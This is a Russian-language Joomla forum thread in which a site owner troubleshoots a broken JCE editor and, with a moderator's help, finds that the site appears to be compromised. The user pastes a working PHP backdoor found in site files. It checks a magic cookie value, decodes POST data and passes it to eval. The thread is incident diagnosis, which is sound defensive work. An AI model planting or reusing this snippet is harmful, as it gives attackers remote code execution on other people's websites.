Не хочет работать JCE редактор

Тема в разделе "Ошибки при работе с Joomla", создана пользователем orensymrak, 18.02.2013.

  1. Offline

    orensymrak Недавно здесь

    Регистрация:
    18.02.2013
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    Здравствуйте, каким то чудесным образом перестал работать JCE редактор а именно, при добавлении новости либо статьи с использованием компонента К2 область редактора JCE категорически отказывается появляться (JCE установлен по умолчанию у юзеров)
    38813cfc089f.jpg
    До этого работало все на отлично, никто не менял никаких настроек.
    Не уверен что в данном разделе описываю ситуацию, но проблемы не только с JCE, но и самой Joomla, некоторые ссылки в панели управления не хотят работать(либо просто не нажимаются либо просто имеют ссылку с # и естественно ничего не происходит.
     
  2.  
  3. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 056
    Симпатии:
    520
    Пол:
    Мужской
    Ну судя по ифно в инете,тебя хакнули через JCE.
    Удаляй JCE , используй TinyMce. И чисти сайт от вируса,шелл
     
    orensymrak нравится это.
  4. Offline

    orensymrak Недавно здесь

    Регистрация:
    18.02.2013
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    Хммм, возможно, сейчас посмотрел и вообще не нашел пункта удалить данный плагин, есть только "выключить", гугл тож что то не помог в этом действии мне. Но даже если так то я менял на TinyMCE результат тот же.

    Теперь вылезла такая ошибка
    Warning: Attempt to assign property of non-object in /var/www/u*****/public_html/****.ru/libraries/joomla/html/editor.php on line 309

    Ошибку устранил, но редактор так и не заработал
     
    Последнее редактирование: 18.02.2013
  5. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 056
    Симпатии:
    520
    Пол:
    Мужской
    Удаляется вместе с компонентом JCE


    А изменил редактор по умолчанию в Общих настройках?
     
  6. Offline

    orensymrak Недавно здесь

    Регистрация:
    18.02.2013
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    Компонент удален, на вирусы просканил доктор веб говорит что чисто, другие сервисы говорят что чисто, а вот данный сайт что то показал - http://sitecheck.sucuri.net/results/unhk.ru ,
    Было изменено, ошибка все равно была но она уже решена, проблемы с редактором все еще актуальна, поле для редактора так и не появилась...
     
  7. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 056
    Симпатии:
    520
    Пол:
    Мужской
    поиск по файлам сайта,маска - base64_decode
     
  8. Offline

    orensymrak Недавно здесь

    Регистрация:
    18.02.2013
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    draff, сейчас еще больше просканировал по многим сервисам пишет чисто, слил все файлы проверил локально тоже чисто, то ли я не правильно это делаю то ли там правда ничего нет)
    Может есть проверенный сайт где можно проверить онлайн?
    Да может дело то не в вирусах? что то с редакторами tinymce тоже же не хочет работать нормально
    http://antivirus-alarm.ru/proverka/?url=unhk.ru%2F
    заранее спасибо
     
    Последнее редактирование: 18.02.2013
  9. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 056
    Симпатии:
    520
    Пол:
    Мужской
    Да может сервис и не показать. Как недавно ,когда был взломан сервер хостера. Хакер не оставлял ничего в файлах,а просто шутил на владельцами сайтов.Сайты работали,а в админке была нарушена работоспособность некоторых расширений,изменял права-имена юзеров,etc.
    Так что -проверяй в БД,если в файлах норма.
     
  10. Offline

    orensymrak Недавно здесь

    Регистрация:
    18.02.2013
    Сообщения:
    5
    Симпатии:
    0
    Пол:
    Мужской
    Команда по SSH: grep -rl ‘base64_decode’ *
    конечно вывела кучу файлов
    А в БД искать на наличие чего, и каким образом, а то уж в БД никогда не копался на таком уровне

    Код (PHP):
    1. if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
    2.  
    3. if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
    4.  
    5.   echo '<textarea id=areatext>';
    6.  
    7.   eval($msg);
    8.  
    9.   echo '</textarea>bg';
    10.  
    11.   exit;
    12.  
    13. }}

    Это очень страшный код?)
    Данный код встречается не во всех файлах но скрипт показывал на многие файлы но данного кода не было

    Я так понял это и есть лазейка сайта, файлы бывают в папках с картинками находятся и там тока этот код, Если да лазейка то выход только один пересобирать заного шаблон всего сайта?
     
    Последнее редактирование: 18.02.2013
  11. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 056
    Симпатии:
    520
    Пол:
    Мужской
    Да,похоже на бекдор.Ставь плагин на запрет POST
     

Поделиться этой страницей

Загрузка...